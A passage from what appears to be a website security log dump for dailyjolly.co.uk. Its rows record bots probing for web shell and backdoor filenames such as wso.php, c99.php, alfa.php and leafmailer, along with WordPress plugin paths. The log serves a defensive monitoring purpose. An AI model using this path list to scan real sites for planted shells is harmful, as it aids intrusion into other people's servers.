ZDbOWod58Jsgiqmutfh24FA','','19|0|0|0|dailyjolly.co.uk/about.php',0,19,0),('35.183.107.9',599223049,'',0,1674121687.2297,55,'XW6nm0jlwhriHKkbZO4z2IoU','','19|0|0|0|dailyjolly.co.uk/content.php',0,19,0),('35.183.107.9',599223049,'',0,1674121687.7815,55,'dUmHfZaCJ72kcqB1EeO5gD3s','','19|0|0|0|dailyjolly.co.uk/4price.php',0,19,0),('35.183.107.9',599223049,'',0,1674121687.9840,55,'6krXKYfhc7jtPduODIaTV3l4','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('35.183.107.9',599223049,'',0,1674121689.2633,55,'Yodnq6R8Evi0bBNZ5r9jDka3','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('35.183.107.9',599223049,'',0,1674121690.6479,55,'Ckn4bAPg85ETcNidRvrlwjS2','','19|0|0|0|dailyjolly.co.uk/wp-info.php',0,19,0),('35.183.107.9',599223049,'',0,1674121691.8022,55,'0YLpgNQOTv3HbCecwl58yShr','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121694.1338,100,'QaFfZHkgpR7YxwAPWiBNsGhy','','13|0|0|0|dailyjolly.co.uk/error.php',0,13,0),('35.183.107.9',599223049,'',0,1674121700.7495,55,'JX7ZbjAv8sCmlx62Spr1OdIo','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('35.183.107.9',599223049,'',0,1674121701.2666,55,'bYZNri17cTkm0tjoDsvyBa4h','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('35.183.107.9',599223049,'',0,1674121701.3793,55,'L8A4zEwPXWCnMlTokS7rVRpe','','19|0|0|0|dailyjolly.co.uk/wp-includes/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121702.7670,55,'YmHlFQVhuTq0iy5PDdb2cJAv','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('35.183.107.9',599223049,'',0,1674121702.9763,55,'6cqhjlG5OeiXFdMnmUtRBPYV','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('35.183.107.9',599223049,'',0,1674121703.4103,55,'KUxFczG5CSmuHQYp1rX8Bgk4','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('35.183.107.9',599223049,'',0,1674121710.2195,55,'ZDz2UtlunWiy1NcSoPQFvHxY','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('35.183.107.9',599223049,'',0,1674121710.2604,55,'1OUupSyWToxACwM5B3dFKN4k','','19|0|0|0|dailyjolly.co.uk/wp-info.php',0,19,0),('35.183.107.9',599223049,'',0,1674121710.3429,55,'BXIFE9zHfS1n6mihGtgyk5x4','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('35.183.107.9',599223049,'',0,1674121710.7206,55,'rPcSgXvztWAje0skpOHoBwQZ','','19|0|0|0|dailyjolly.co.uk/sendmail.php',0,19,0),('35.183.107.9',599223049,'',0,1674121711.6100,55,'4ctxjTs9unb5dfSRvUP7oVBW','','19|0|0|0|dailyjolly.co.uk/4price.php',0,19,0),('35.183.107.9',599223049,'',0,1674121711.6786,55,'VSIKfCxF4i83zUyhBNswYLPl','','19|0|0|0|dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('35.183.107.9',599223049,'',0,1674121711.7898,55,'ldXypsbkO3CjYcgv4REH7STQ','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121711.8025,55,'cTZSxGXR1VL43K7mPA2pQaOI','','19|0|0|0|dailyjolly.co.uk/y.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.0416,55,'xqZHzAn9t0giwCW7DmQuRI1c','','19|0|0|0|dailyjolly.co.uk/swm.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.0440,55,'xGpyXMnhoOUm7S25rq83NePw','','19|0|0|0|dailyjolly.co.uk/ok.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.2036,55,'Bf9bygsplMGXUt2rKdWOR83J','','19|0|0|0|dailyjolly.co.uk/shell20220621.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.3825,55,'XsjQUF6h9ibY0S5m4qGv8g7N','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.3950,55,'aDQGZsC8gHfikOlS9VnBUK17','','19|0|0|0|dailyjolly.co.uk/about.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.7944,55,'CA0J4XjWYFnP3yRVft6Ik9xq','','19|0|0|0|dailyjolly.co.uk/radio.php',0,19,0),('35.183.107.9',599223049,'',0,1674121712.8919,100,'ixCcOE5oS4QdX7vnWsPhuNqp','','13|0|0|0|dailyjolly.co.uk/error.php',0,13,0),('35.183.107.9',599223049,'',0,1674121713.3875,55,'emjSEgb4Bkfx3MoDYUCq1chy','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/config.bak.php',0,19,0),('35.183.107.9',599223049,'',0,1674121716.5850,55,'5tIW6BidGfgRyJw3oMqKmV7H','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('35.183.107.9',599223049,'',0,1674121718.0006,55,'ywTDFqVxWio2SnY35JcN4HCh','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/up.php',0,19,0),('35.183.107.9',599223049,'',0,1674121719.4322,55,'q6n5E2TjzlFOPBhKafSV3xXd','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('35.183.107.9',599223049,'',0,1674121719.4917,55,'kRldHFon73BDeJ1sYCrTfxG0','','19|0|0|0|dailyjolly.co.uk/mari.php',0,19,0),('35.183.107.9',599223049,'',0,1674121720.0260,55,'ZdSvB1YQaxVkzreKA4y28hFJ','','19|0|0|0|dailyjolly.co.uk/m.php',0,19,0),('35.183.107.9',599223049,'',0,1674121720.1078,55,'yQh4v9tT17goAwLVEfrSNxR3','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121720.3327,55,'dCHEk08cKYi6vnb4G3RUO2DM','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('35.183.107.9',599223049,'',0,1674121720.6947,55,'RWirMaw49zT5pq3nDZU0mVC8','','19|0|0|0|dailyjolly.co.uk/up.php',0,19,0),('35.183.107.9',599223049,'',0,1674121724.7027,55,'ZUC631wIFpojbNdSOLx9HQMh','','19|0|0|0|dailyjolly.co.uk/gank.php.PhP',0,19,0),('35.183.107.9',599223049,'',0,1674121724.9705,55,'0psRqyCES4uLHagFUON59iDW','','19|0|0|0|dailyjolly.co.uk/k.php',0,19,0),('35.183.107.9',599223049,'',0,1674121725.4109,55,'EwKI3eTFZa6kvb7OtgDNQPUd','','19|0|0|0|dailyjolly.co.uk/lufix.php',0,19,0),('35.183.107.9',599223049,'',0,1674121726.4128,55,'SJ7nkFhuiqQEXLDTzPbwyxHp','','19|0|0|0|dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('35.183.107.9',599223049,'',0,1674121727.1110,55,'tkbDu9Aqoa0W2pX5v1CwUR7c','','19|0|0|0|dailyjolly.co.uk/wp-admin/maint/about.php',0,19,0),('35.183.107.9',599223049,'',0,1674121728.5908,55,'vEAFwqeomzcxTUWL34iVBKrb','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121729.4810,55,'74Ki3hZejS2JznrHvUBgw1Lq','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/config.bak.php',0,19,0),('35.183.107.9',599223049,'',0,1674121729.6467,55,'cXN5hTkyjuCsUx2lo93LrPBW','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121730.1323,55,'2DpVh0bq56mQCFkc93wPfHZM','','19|0|0|0|dailyjolly.co.uk/license.php',0,19,0),('35.183.107.9',599223049,'',0,1674121730.4442,55,'SM5wIXLAk7phruEnifj346yt','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('35.183.107.9',599223049,'',0,1674121731.0826,55,'RaqmM2UhxCStKVY6fJ0DNZvH','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121731.6122,55,'pijOr1glWXETvDyYxFBtzP3c','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('35.183.107.9',599223049,'',0,1674121732.8449,55,'Q9jXRgBkSNfKMmnius70YOUJ','','19|0|0|0|dailyjolly.co.uk/wp-content/uploads/2021/12/up.php',0,19,0),('35.183.107.9',599223049,'',0,1674121733.8624,55,'1GXsSrNFvpUHEOlCx2LWjoYc','','19|0|0|0|dailyjolly.co.uk/mari.php',0,19,0),('35.183.107.9',599223049,'',0,1674121734.7553,55,'T7q5s3N8jgeAIuVYGO6opxtZ','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('35.183.107.9',599223049,'',0,1674121735.7046,55,'C1pLUGExyqNSfKQb49rszW3v','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('35.183.107.9',599223049,'',0,1674121735.8389,55,'xLRIe2hlJmiwHPCzSdnQo3ty','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('35.183.107.9',599223049,'',0,1674121738.7713,55,'eBu6HYxMXiSnRVFKa5NAopOz','','19|0|0|0|dailyjolly.co.uk/.tmb/cache/shz.php',0,19,0),('35.183.107.9',599223049,'',0,1674121739.1138,55,'1PM9QikCwFqVLZ6XIp5Osvb8','','19|0|0|0|dailyjolly.co.uk/shell20220621.php',0,19,0),('35.183.107.9',599223049,'',0,1674121741.0798,55,'IfywJTBgQAE65DFxuSUhbMo1','','19|0|0|0|dailyjolly.co.uk/gank.php.PhP',0,19,0),('35.183.107.9',599223049,'',0,1674121741.4374,55,'rLZjCUzTeYIKwlM12SsWv5hx','','19|0|0|0|dailyjolly.co.uk/lufix.php',0,19,0),('35.183.107.9',599223049,'',0,1674121741.5816,55,'TZc0V7C4QSKFe9nkMmb1yaOs','','19|0|0|0|dailyjolly.co.uk/wp-admin/maint/about.php',0,19,0),('35.183.107.9',599223049,'',0,1674121741.8976,55,'zL0rRuDCYn5XwSjscg1ofaUH','','19|0|0|0|dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121742.6433,55,'qx1oe6fLmJXrAGT5uwsFQSEV','','19|0|0|0|dailyjolly.co.uk/license.php',0,19,0),('35.183.107.9',599223049,'',0,1674121742.8973,55,'5S3GU1sd06QrhqKcy7azkwlg','','19|0|0|0|dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121743.4615,55,'1ILuEPUKi8cojv3Ds2NwrQOx','','19|0|0|0|dailyjolly.co.uk/media-admin.php',0,19,0),('35.183.107.9',599223049,'',0,1674121744.0954,55,'o6BR3YKQmceDIysHd4tiZ8hA','','19|0|0|0|dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('35.183.107.9',599223049,'',0,1674121744.2461,55,'mqb6HRa5BNFcUyJwKZlrpMe0','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('35.183.107.9',599223049,'',0,1674121744.8105,55,'T6ieXhZgr8uFa1zAJ05NHdc9','','19|0|0|0|dailyjolly.co.uk/.tmb/cache/shz.php',0,19,0),('35.183.107.9',599223049,'',0,1674121751.1014,55,'Hc4LJwBZbQlgX6Y1NmnuCiqF','','19|0|0|0|dailyjolly.co.uk/wp-content/about.php',0,19,0),('35.183.107.9',599223049,'',0,1674121751.1592,55,'H6Xs1YNLOn29FQDAPi0vIUWJ','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121751.3091,55,'P7UxyC4YEXKojgAiBOGM8kZv','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('35.183.107.9',599223049,'',0,1674121751.3604,55,'gXMF9pNVf0scITznhQByHA3K','','19|0|0|0|dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('35.183.107.9',599223049,'',0,1674121753.7368,55,'1Uu5gX4JB2IEAQGWlNxfaDqs','','19|0|0|0|dailyjolly.co.uk/f.php',0,19,0),('35.183.107.9',599223049,'',0,1674121754.4140,55,'wYOmWevt1RPhyc45UdLGxbBg','','19|0|0|0|dailyjolly.co.uk/wp-includes/images/wp-blog.php',0,19,0),('35.183.107.9',599223049,'',0,1674121755.1629,55,'YFzoDHObZGEtWcqPJKsemNRV','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-content/themes/seotheme/mar.php',0,19,0),('35.183.107.9',599223049,'',0,1674121757.6165,55,'vNVC1OH7xgSLhqEI26np9ij0','','19|0|0|0|dailyjolly.co.uk/wp-content/about.php',0,19,0),('35.183.107.9',599223049,'',0,1674121765.8869,55,'yQk9YK8NqLUzGZCmTEFhpnP5','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('35.183.107.9',599223049,'',0,1674121765.9467,55,'kvxN4VnocKsbW1PJyYhGw6d2','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('35.183.107.9',599223049,'',0,1674121770.0340,55,'59fU1iBN46eP8L2mnwYTgjaR','','19|0|0|0|dailyjolly.co.uk/o.php',0,19,0),('35.183.107.9',599223049,'',0,1674121770.2585,55,'b2HqCnusW3jOkXhMmTAF9JQy','','19|0|0|0|dailyjolly.co.uk/fw.php',0,19,0),('20.14.84.163',336483491,'',0,1674121802.7348,100,'w2rnDo6VRGAiOXQ1LqNYH5d4','','13|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,13,0),('20.14.84.163',336483491,'',0,1674121805.8253,100,'6Igo2m9lrSn7xdAbHOLZYkWB','','13|0|0|0|www.dailyjolly.co.uk/wp-content/theme/seotheme/db.php',0,13,0),('20.14.84.163',336483491,'',0,1674121814.7554,100,'fqhdAkQaRx9EL6KZ40TVFUr8','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,13,0),('20.14.84.163',336483491,'',0,1674121831.4900,55,'e1IbAFaJG5YjxXkM8oTE6zQm','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('20.14.84.163',336483491,'',0,1674121847.4046,55,'rg2FyUaIRTQZu1pkhz0W7YNs','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.14.84.163',336483491,'',0,1674121916.6069,100,'fdjz4X1HLVgMWIG8pYTabJl9','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/db.php',0,13,0),('20.14.84.163',336483491,'',0,1674121948.6791,55,'LnUF73EzT8xpeDVyAs2aqKYS','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-class.php',0,19,0),('20.14.84.163',336483491,'',0,1674121956.8756,55,'HD0EQ6wAulRSWbd9qUnYXZza','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/fonts/css.php',0,19,0),('20.14.84.163',336483491,'',0,1674121973.5690,55,'QLDcR96sHmTgnybuwJAOjt5a','','19|0|0|0|www.dailyjolly.co.uk/0z.php',0,19,0),('20.14.84.163',336483491,'',0,1674121977.5587,55,'qkbVmcgY3M8hBAH7z102GJQN','','19|0|0|0|www.dailyjolly.co.uk/wp-content/admin.php',0,19,0),('20.14.84.163',336483491,'',0,1674121979.2478,55,'k4hsDtGRuFHWY3752TrQgCKB','','19|0|0|0|www.dailyjolly.co.uk/wp-content/utchiha-HJHB.php',0,19,0),('20.14.84.163',336483491,'',0,1674121984.4447,100,'JMAxh0aEvFdRBiO6eC3nIcrN','','13|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,13,0),('20.14.84.163',336483491,'',0,1674121991.6407,55,'xA5w3TgbPqWBRhDnCKIjk6HZ','','19|0|0|0|www.dailyjolly.co.uk/lufix.php',0,19,0),('20.14.84.163',336483491,'',0,1674121996.8849,55,'OIVU7CP3w40a18LRbQ6BrDSy','','19|0|0|0|www.dailyjolly.co.uk/upl.php',0,19,0),('20.14.84.163',336483491,'',0,1674121999.2646,18,'1JdDlTMaBm6EfqsYgpxOj4nL','','13|0|0|0|www.dailyjolly.co.uk/upl.php',0,13,0),('72.52.161.87',1211408727,'',0,1674144960.3853,55,'uEi0kspFA7tD8zfT4jSaqgWN','','19|0|0|0|www.dailyjolly.co.uk/Telerik.Web.UI.WebResource.axd',0,19,0),('167.172.248.229',2813130981,'',0,1674151223.4125,55,'Hd2zWPvXV9GtqZuSam8n3Ys7','','19|0|0|0|www.dailyjolly.co.uk/.well-known/https:/www.dailyjolly.co.uk/xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674151224.2502,55,'39LvaVRhYlyZoED82JCIuNGf','','19|0|0|0|www.dailyjolly.co.uk/admin/controller/extension/extension/https:/www.dailyjolly.co.uk/xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674151225.0533,55,'xpJzhTnB75SRZc3dWej2k9C8','','19|0|0|0|www.dailyjolly.co.uk/admin/tmp/https:/www.dailyjolly.co.uk/xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674151225.8146,55,'UEGg1X0TVKnCkyBbJxfm5YWL','','19|0|0|0|www.dailyjolly.co.uk/admin/upload/https:/www.dailyjolly.co.uk/xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674151226.5720,55,'sHtLdxFAB4Q0MPbKDmaN8OvJ','','19|0|0|0|www.dailyjolly.co.uk/administrator/https:/www.dailyjolly.co.uk/xmlrpc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674151226.5905,10,'sHtLdxFAB4Q0MPbKDmaN8OvJ','','707|0|0|0|www.dailyjolly.co.uk/administrator/https:/www.dailyjolly.co.uk/xmlrpc.php',0,707,0),('185.192.70.206',3116385998,'',0,1674181815.1595,55,'cG7ShXy2WlZ0qxtprACo6Kkm','','19|0|0|0|dailyjolly.co.uk/wp-admin/imagescheckflush.php',0,19,0),('40.117.83.110',678777710,'',0,1674201203.5160,55,'hCf7RQ2ijOuYP3EwrpLnHc9y','','19|0|0|0|www.dailyjolly.co.uk/wp-plain.php',0,19,0),('40.117.83.110',678777710,'',0,1674201207.1803,55,'xnT72YuiQXdoHl0OpsGPF5hB','','19|0|0|0|www.dailyjolly.co.uk/zylgaagq.php',0,19,0),('40.117.83.110',678777710,'',0,1674201213.7398,55,'kprRHPyw6jixS9ohUuvCEmJs','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php',0,19,0),('123.30.210.207',2065617615,'',0,1674225273.7327,55,'kfs2VpZQ7GCAxDIMbwTB5JiX','','19|0|0|0|dailyjolly.co.uk/wp-admin/style.php',0,19,0),('123.30.210.207',2065617615,'',0,1674225273.7642,55,'gjlnMKWhpemyw7XirSYU1GFb','','19|0|0|0|dailyjolly.co.uk/style.php',0,19,0),('20.84.48.39',341061671,'',0,1674228736.2910,55,'60x1lzYvDweXCfZksIhgtVRQ','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('20.84.48.39',341061671,'',0,1674228857.2591,55,'S0N2xKd4VZEAQLYbJMaOoCcR','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('20.84.48.39',341061671,'',0,1674228942.5789,55,'S3gxQMhtDzp5yUeFJHdCnLfY','','19|0|0|0|dailyjolly.co.uk/c99.php',0,19,0),('20.84.48.39',341061671,'',0,1674229013.4354,55,'9b1YjuExMHL3Pw8WvmAGe0rc','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('20.84.48.39',341061671,'',0,1674229126.1541,55,'CJEwYdHStmuUjyOzqRgFpAe2','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('20.84.48.39',341061671,'',0,1674229126.2473,10,'CJEwYdHStmuUjyOzqRgFpAe2','','707|0|0|0|dailyjolly.co.uk/a.php',0,707,0),('20.84.48.39',341061671,'',0,1674229164.3403,55,'eagAxGTjHFIchpbJOwPu6E98','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('20.84.48.39',341061671,'',0,1674229278.0564,55,'Hw5NgixbJtqY82WK6ljBUpkS','','19|0|0|0|dailyjolly.co.uk/home.php',0,19,0),('20.84.48.39',341061671,'',0,1674229317.0181,55,'mZAugJMntl3hWFvHIXVcobRP','','19|0|0|0|dailyjolly.co.uk/shell.php',0,19,0),('20.84.48.39',341061671,'',0,1674229465.2108,55,'PuXEmal3LizK0VRoxkItjpFC','','19|0|0|0|dailyjolly.co.uk/leaf.php',0,19,0),('20.84.48.39',341061671,'',0,1674229542.9731,55,'bYq3c0zgKeT5QBAt7LIwjMaU','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('20.84.48.39',341061671,'',0,1674229764.9697,55,'dkNYCp7RUK1xHs9zcrSDJ8AL','','19|0|0|0|dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.84.48.39',341061671,'',0,1674229801.1676,55,'M0Xez41q2WjxigbtmaVpFd8o','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('20.84.48.39',341061671,'',0,1674229837.2356,55,'JoLQ2V81Z6PO3deizBnUSYym','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('20.84.48.39',341061671,'',0,1674229946.7658,55,'4g1vNUatyD6QMBksz7hq8RnF','','19|0|0|0|dailyjolly.co.uk/leaf.php',0,19,0),('20.84.48.39',341061671,'',0,1674230016.5801,55,'hvPWKf3RO9cAGCat5yEml6Q1','','19|0|0|0|dailyjolly.co.uk/alex.php',0,19,0),('20.84.48.39',341061671,'',0,1674230053.0125,55,'BLI6FqPlwc2ZCdxfKN0e4tjO','','19|0|0|0|dailyjolly.co.uk/uploader.php',0,19,0),('20.84.48.39',341061671,'',0,1674230273.7101,55,'l4nauQhEpDTVmKvR5bteIHLf','','19|0|0|0|dailyjolly.co.uk/mailer.php',0,19,0),('20.84.48.39',341061671,'',0,1674230351.0615,55,'OX8zE1WMu7DtLaHfGr60eyBK','','19|0|0|0|dailyjolly.co.uk/anone.php',0,19,0),('20.84.48.39',341061671,'',0,1674230436.3996,55,'u1n4P2ae7lDVSQkvqyEb6fcz','','19|0|0|0|dailyjolly.co.uk/a.php',0,19,0),('20.84.48.39',341061671,'',0,1674230690.7441,55,'YVjT5nKpMymE6HB07tf9UleC','','19|0|0|0|dailyjolly.co.uk/wp-configer.php',0,19,0),('20.84.48.39',341061671,'',0,1674230691.0856,55,'rIHLQojkFMYZJG7ayX9qdP2u','','19|0|0|0|dailyjolly.co.uk/alfa.php',0,19,0),('20.84.48.39',341061671,'',0,1674230728.7903,55,'Gl6aiJKszmnxTU4XBeRL8hSc','','19|0|0|0|dailyjolly.co.uk/wso.php',0,19,0),('20.84.48.39',341061671,'',0,1674230763.8366,55,'PtXF6EcQudjy2UKk07iTDobV','','19|0|0|0|dailyjolly.co.uk/c.php',0,19,0),('20.84.48.39',341061671,'',0,1674230801.0083,55,'8GgvLnh4e1aNEMSKbioW5VIu','','19|0|0|0|dailyjolly.co.uk/1.php',0,19,0),('20.84.48.39',341061671,'',0,1674230874.6473,55,'re2fCJcdZ8yKntzjLpAbUxvu','','19|0|0|0|dailyjolly.co.uk/send.php',0,19,0),('20.84.48.39',341061671,'',0,1674230910.1744,55,'kzRUAopiE9qdOfeFcLVghtNb','','19|0|0|0|dailyjolly.co.uk/3.php',0,19,0),('20.84.48.39',341061671,'',0,1674230946.1728,55,'tIsBUP7VnvgDu9XZmcq5S6Qj','','19|0|0|0|dailyjolly.co.uk/404.php',0,19,0),('20.84.48.39',341061671,'',0,1674230985.1373,55,'dELlWYGmzRSNFKn1k4eArMsB','','19|0|0|0|dailyjolly.co.uk/sym.php',0,19,0),('20.84.48.39',341061671,'',0,1674230985.5261,55,'ZCdoLR7VJ3yb2sitv9u4QSP8','','19|0|0|0|dailyjolly.co.uk/wp-confirm.php',0,19,0),('20.84.48.39',341061671,'',0,1674231020.4544,55,'AH7YPZCIscLdjGftuJOQxEaz','','19|0|0|0|dailyjolly.co.uk/images/vuln.php',0,19,0),('20.84.48.39',341061671,'',0,1674231059.0420,55,'dwi7pF19RtQyDhEBsZbjArov','','19|0|0|0|dailyjolly.co.uk/dr.php',0,19,0),('20.84.48.39',341061671,'',0,1674231096.4340,55,'OYsU1SnE4QzFL5NxTWR6AtqK','','19|0|0|0|dailyjolly.co.uk/upload.php',0,19,0),('20.84.48.39',341061671,'',0,1674231129.8961,55,'r6357thTbAPnwep2x9JNvSdm','','19|0|0|0|dailyjolly.co.uk/bypass.php',0,19,0),('20.84.48.39',341061671,'',0,1674231167.4075,55,'Qp3R7MJUBGwSebNOZLxVlKzH','','19|0|0|0|dailyjolly.co.uk/wp-blog.php',0,19,0),('20.84.48.39',341061671,'',0,1674231204.1459,55,'Ozsr6UHYf1GcxiwCQJyFqSdX','','19|0|0|0|dailyjolly.co.uk/data.php',0,19,0),('20.84.48.39',341061671,'',0,1674231240.0961,55,'Dezb0SjZ1BGnCARt8m5kLiVh','','19|0|0|0|dailyjolly.co.uk/owl.php',0,19,0),('20.84.48.39',341061671,'',0,1674231501.8129,55,'NeHLd6rgvuR1hMUGY7kDal2O','','19|0|0|0|dailyjolly.co.uk/vuln.php',0,19,0),('20.84.48.39',341061671,'',0,1674231575.6156,55,'B0TELuFeIV3XiwKRcqDMYmPn','','19|0|0|0|dailyjolly.co.uk/symlink.php',0,19,0),('20.84.48.39',341061671,'',0,1674231648.0424,55,'z9j46eSaMRs7BDbwmnc8WyC0','','19|0|0|0|dailyjolly.co.uk/ohayo.php',0,19,0),('20.84.48.39',341061671,'',0,1674231721.7646,55,'pz3XZr2UQ7DvMJAnqxi1gLlR','','19|0|0|0|dailyjolly.co.uk/100.php',0,19,0),('20.84.48.39',341061671,'',0,1674231759.1830,55,'GMbDpnazkdLZHTF5fhuiC49Q','','19|0|0|0|dailyjolly.co.uk/777.php',0,19,0),('20.84.48.39',341061671,'',0,1674231759.5989,55,'6ULxZ5vnequmIA3h9iSC7lJd','','19|0|0|0|dailyjolly.co.uk/wp-content/wp-logins.php',0,19,0),('20.84.48.39',341061671,'',0,1674231760.0077,55,'A96y21ZDaJUlRsWtMr7QvPYz','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('20.84.48.39',341061671,'',0,1674231796.1750,55,'PmdqEB3nJSRMbIVx6QATf2uL','','19|0|0|0|dailyjolly.co.uk/wp-wso.php',0,19,0),('20.84.48.39',341061671,'',0,1674231830.2856,55,'3g4SOtUTvDIKpFfRZyeXba6Y','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('20.84.48.39',341061671,'',0,1674231865.1758,55,'nZ7TOuchV3kwXQ8DryStb1ps','','19|0|0|0|dailyjolly.co.uk/wp-content/wp-admin.php',0,19,0),('20.84.48.39',341061671,'',0,1674231935.0656,55,'bCQng7vL6GMx18iX3jAJ9drp','','19|0|0|0|dailyjolly.co.uk/wp-configer.php',0,19,0),('20.84.48.39',341061671,'',0,1674232006.7856,55,'bOYMPBxeqokDrTVWXcpgQ5AZ','','19|0|0|0|dailyjolly.co.uk/wp-admin.php',0,19,0),('20.84.48.39',341061671,'',0,1674232042.7769,55,'VhOBmG1gL8Mb7NoX5yiKcknj','','19|0|0|0|dailyjolly.co.uk/mini.php',0,19,0),('20.84.48.39',341061671,'',0,1674232078.1770,55,'7fJr1EzjIBK2Q0ZalmFeLhUc','','19|0|0|0|dailyjolly.co.uk/old-index.php',0,19,0),('20.84.48.39',341061671,'',0,1674232150.2596,55,'83U1vuTX9PR4bkys2xGoKe0F','','19|0|0|0|dailyjolly.co.uk/doc.php',0,19,0),('20.84.48.39',341061671,'',0,1674232222.2658,55,'9xUgOHp6mZkveVXr1A2Ttu8C','','19|0|0|0|dailyjolly.co.uk/ups.php',0,19,0),('20.84.48.39',341061671,'',0,1674232259.9131,55,'sai6mTLuxCItfXZGqhcdQb31','','19|0|0|0|dailyjolly.co.uk/shx.php',0,19,0),('20.84.48.39',341061671,'',0,1674232432.1826,55,'Zz1niPGAce0gCMH8t6RrK9q2','','19|0|0|0|dailyjolly.co.uk/FoxWSO.php',0,19,0),('20.84.48.39',341061671,'',0,1674232469.2426,55,'c1XghzxiaQeAOtkqrwBVm2T0','','19|0|0|0|dailyjolly.co.uk/x.php',0,19,0),('20.84.48.39',341061671,'',0,1674232609.2082,55,'oLaC2qMnjGEl3ysX5fg6OxcQ','','19|0|0|0|dailyjolly.co.uk/cms.php',0,19,0),('20.84.48.39',341061671,'',0,1674232644.0128,55,'MH8hRa279CrcwfYW05BsAIT4','','19|0|0|0|dailyjolly.co.uk/stindex.php',0,19,0),('20.84.48.39',341061671,'',0,1674232725.1587,55,'eZ8gk5Jao46GzKsYivN9EFmr','','19|0|0|0|dailyjolly.co.uk/wp-uploads.php',0,19,0),('20.84.48.39',341061671,'',0,1674232797.1493,55,'Nz8tIGvwSE0jCVqbYFfZUDAd','','19|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,19,0),('20.84.48.39',341061671,'',0,1674232797.1656,10,'Nz8tIGvwSE0jCVqbYFfZUDAd','','707|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,707,0),('20.84.48.39',341061671,'',0,1674232869.4452,55,'4ACjE0zsoc1Y3KhdgJyMXfvQ','','19|0|0|0|dailyjolly.co.uk/Gel.php',0,19,0),('20.84.48.39',341061671,'',0,1674232940.3515,55,'lKnJm9oGF26RtgP35MsCkrZy','','19|0|0|0|dailyjolly.co.uk/defau